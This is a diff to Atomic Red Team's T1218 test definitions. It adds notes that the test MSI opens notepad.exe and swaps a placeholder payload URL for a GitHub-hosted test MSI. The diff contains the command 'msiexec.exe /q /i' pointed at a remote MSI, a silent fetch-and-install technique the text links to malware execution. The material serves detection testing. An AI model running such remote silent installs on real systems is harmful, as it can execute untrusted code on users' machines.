diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index d02a270f..ddaac82b 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -161,7 +161,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 <br/>
 
 ## Atomic Test #4 - Msiexec.exe - Execute Local MSI file
-Execute arbitrary MSI file. Commonly seen in application installation.
+Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.
 
 **Supported Platforms:** Windows
 
@@ -202,7 +202,7 @@ Write-Host "You must provide your own MSI"
 <br/>
 
 ## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file
-Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
+Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.
 
 **Supported Platforms:** Windows
 
@@ -212,7 +212,7 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| msi_payload | MSI file to execute | String | http://site.com/file.msi|
+| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi|
 
 
 #### Attack Commands: Run with `command_prompt`! 
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 49d752bb..596fb2e0 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -12089,6 +12089,7 @@ defense-evasion:
 '
     - name: Msiexec.exe - Execute Local MSI file
       description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+        The MSI opens notepad.exe when sucessfully executed.
 
 '
       supported_platforms:
@@ -12110,7 +12111,8 @@ defense-evasion:
 '
     - name: Msiexec.exe - Execute Remote MSI file
       description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
-        in application installation, commonly seen in malware execution.
+        in application installation, commonly seen in malware execution. The MSI opens
+        notepad.exe when sucessfully executed.
 
 '
       supported_platforms:
@@ -12119,7 +12121,7 @@ defense-evasion:
         msi_payload:
           description: MSI file to execute
           type: String
-          default: http://site.com/file.msi
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
       executor:
         name: command_prompt
         command: 'msiexec.exe /q /i "#{msi_payload}"
@@ -24307,6 +24309,7 @@ execution:
 '
     - name: Msiexec.exe - Execute Local MSI file
       description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+        The MSI opens notepad.exe when sucessfully executed.
 
 '
       supported_platforms:
@@ -24328,7 +24331,8 @@ execution:
 '
     - name: Msiexec.exe - Execute Remote MSI file
       description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
-        in application installation, commonly seen in malware execution.
+        in application installation, commonly seen in malware execution. The MSI opens
+        notepad.exe when sucessfully executed.
 
 '
       supported_platforms:
@@ -24337,7 +24341,7 @@ execution:
         msi_payload:
           description: MSI file to execute
           type: String
-          default: http://site.com/file.msi
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
       executor:
         name: command_prompt
         command: 'msiexec.exe /q /i "#{msi_payload}"